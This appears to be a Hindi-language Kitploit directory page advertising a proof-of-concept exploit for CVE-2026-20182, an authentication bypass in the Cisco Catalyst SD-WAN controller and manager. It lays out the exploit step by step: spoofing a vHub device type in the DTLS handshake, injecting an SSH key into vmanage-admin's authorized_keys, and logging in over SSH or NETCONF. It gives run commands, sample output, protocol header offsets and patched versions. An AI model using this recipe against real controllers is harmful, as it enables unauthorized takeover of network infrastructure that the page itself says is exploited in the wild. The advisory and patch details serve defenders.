Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-20182 — CVE-2026-20182 PoC - Cisco Catalyst SD-WAN Controller / Manager Authentication Bypass (CVSS 10.0) | Kitploit
उपकरण/GitHubGitHub/portbuster1337/cve-2026-20182
Exploit FrameworksVulnerability AnalysisExploitationNetwork SecurityPenetration TestingCloud SecurityAuthenticationRed Teaming
GitHubportbuster1337/cve-2026-20182

CVE-2026-20182

CVE-2026-20182 PoC - Cisco Catalyst SD-WAN Controller / Manager Authentication Bypass (CVSS 10.0)

रिपॉजिटरी देखें
33 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2026-20182 — Cisco Catalyst SD-WAN नियंत्रक / प्रबंधक प्रमाणीकरण उपेक्षा

CVE-2026-20182 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Cisco Catalyst SD-WAN नियंत्रक (vSmart) और प्रबंधक (vManage) पर vdaemon DTLS सेवा (UDP/12346) में एक गंभीर (CVSS 10.0) प्रमाणीकरण उपेक्षा है।

प्रकटीकरण: 14 मई 2026 Rapid7 (Stephen Fewer & Jonah Burgess) द्वारा
CISA KEV: 14 मई 2026 को जोड़ा गया (आपातकालीन निर्देश 26-03)
CVSS: 10.0 — CWE-287: अनुचित प्रमाणीकरण

भेद्यता

vdaemon सेवा नियंत्रण-प्लेन पीयर्स को प्रमाणित करने के लिए एक बहु-चरणीय DTLS हैंडशेक का उपयोग करती है। vbond_proc_challenge_ack() फ़ंक्शन डिवाइस-प्रकार-विशिष्ट प्रमाणपत्र सत्यापन लागू करता है — लेकिन डिवाइस प्रकार 2 (vHub) में कोई सत्यापन कोड पथ नहीं है। device_type=2 के साथ CHALLENGE_ACK भेजने से फ़ंक्शन हर शर्त को विफल कर देता है और बिना शर्त peer->authenticated = 1 सेट कर देता है।

किसी वैध क्रेडेंशियल, CA-हस्ताक्षरित प्रमाणपत्र, या SD-WAN तैनाती के ज्ञान की आवश्यकता नहीं है।

एक्सप्लॉइट क्या करता है

  1. लक्ष्य की vdaemon सेवा (UDP/12346) से DTLS 1.2 कनेक्शन स्थापित करता है
  2. CHALLENGE संदेश (msg_type=8) प्राप्त करता है
  3. vHub (device_type=2) होने का दावा करते हुए CHALLENGE_ACK भेजता है → पीयर प्रमाणित के रूप में चिह्नित होता है
  4. HELLO (msg_type=5) भेजता है → पीयर UP स्थिति में परिवर्तित होता है
  5. MSG_VMANAGE_TO_PEER (msg_type=14) के माध्यम से /home/vmanage-admin/.ssh/authorized_keys में एक SSH सार्वजनिक कुंजी इंजेक्ट करता है
  6. vmanage-admin के रूप में NETCONF पहुंच (SSH TCP/830) या SSH पहुंच (TCP/22) प्रदान करता है

उपयोग

root@kitploit:~
python3 cve-2026-20182.py -t <target> [options]

विकल्प

तर्कविवरण

उदाहरण

root@kitploit:~
# एक नई कुंजी जोड़ी उत्पन्न करें और शोषण करें
python3 cve-2026-20182.py -t 192.168.1.100

# मौजूदा सार्वजनिक कुंजी का उपयोग करें
python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub

# शोषण करें और NETCONF के माध्यम से सत्यापित करें
python3 cve-2026-20182.py -t 192.168.1.100 --netconf

आउटपुट

root@kitploit:~
[*] Targeting 192.168.1.100:12346 (vdaemon DTLS)
[+] DTLS handshake complete (received msg_type=8, 1027 bytes)
[*] Sending CHALLENGE_ACK with device_type=2 (vHub) ...
[+] peer->authenticated = 1 (authentication bypassed!)
[*] Sending HELLO ...
[+] Peer is UP state (peering handshake bypass successful)
[*] Injecting SSH public key ...

[+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 [email protected]
[+] SSH:     ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa [email protected]

प्रभावित संस्करण

अनुसंधान संदर्भ

  • Rapid7 (मूल प्रकटीकरण): CVE-2026-20182: Cisco Catalyst SD-WAN नियंत्रक में गंभीर प्रमाणीकरण उपेक्षा — Stephen Fewer और Jonah Burgess द्वारा पूर्ण तकनीकी विश्लेषण, डीकंपाइल्ड कोड और प्रोटोकॉल विवरण
  • Cisco सुरक्षा सलाह: cisco-sa-sdwan-rpa2-v69WY2SW — नियत संस्करणों के साथ विक्रेता सलाह
  • CISA KEV: CVE-2026-20182 — आपातकालीन निर्देश 26-03 (17 मई 2026 तक उपचार)
  • NVD: CVE-2026-20182 — राष्ट्रीय भेद्यता डेटाबेस प्रविष्टि
  • Rapid7 Metasploit मॉड्यूल: cisco_sdwan_vhub_auth_bypass — Metasploit फ्रेमवर्क में सहायक मॉड्यूल
  • BleepingComputer: Cisco ने जीरो-डे हमलों में शोषित नई गंभीर SD-WAN खामी की चेतावनी दी
  • Tenable: Cisco SD-WAN भेद्यताओं के निरंतर शोषण के बारे में FAQ
  • Cisco Talos: खतरा अभिनेता UAT-8616 को वास्तविक दुनिया में इस भेद्यता का शोषण करने का श्रेय

तकनीकी विवरण

vdaemon प्रोटोकॉल हेडर 12 बाइट्स का है:

डिवाइस प्रकार: 1=vEdge, 2=vHub, 3=vSmart, 4=vBond, 5=vManage

आवश्यकताएँ

  • Python 3.7+
  • openssl CLI (DTLS परिवहन के लिए)
  • cryptography लाइब्रेरी (pip install cryptography)

अस्वीकरण

यह एक्सप्लॉइट केवल अधिकृत रेड टीम संचालन, पैठ परीक्षण, और उन सिस्टमों पर सुरक्षा अनुसंधान के लिए है जहाँ आपके पास स्पष्ट लिखित अनुमति है। अनधिकृत उपयोग अवैध है।

टूल डाउनलोड करें
-t, --target
लक्ष्य IP या होस्टनाम
--portvdaemon UDP पोर्ट (डिफ़ॉल्ट: 12346)
--key-fileइंजेक्ट करने के लिए मौजूदा SSH सार्वजनिक कुंजी का पथ (वैकल्पिक)
--netconfSSH के माध्यम से NETCONF से जुड़कर शोषण सत्यापित करें
रिलीज़नियत संस्करण
< 20.9समर्थित रिलीज़ पर माइग्रेट करें
20.920.9.9.1
20.1020.12.7.1
20.1120.12.7.1
20.1220.12.5.4 / 20.12.6.2 / 20.12.7.1
20.1320.15.5.2
20.1420.15.5.2
20.1520.15.4.4 / 20.15.5.2
20.1620.18.2.2
20.1820.18.2.2
26.1.126.1.1.1
ऑफसेटआकारफील्डनोट्स
01msg_typeनिम्न निबल = प्रकार, उच्च निबल = संस्करण
11device_infoउच्च निबल = device_type, निम्न निबल = फ्लैग्स
21flagsमानक मान 0xA0
31पैडिंगहमेशा 0x00
4-74domain_idबिग-एंडियन uint32
8-114site_idबिग-एंडियन uint32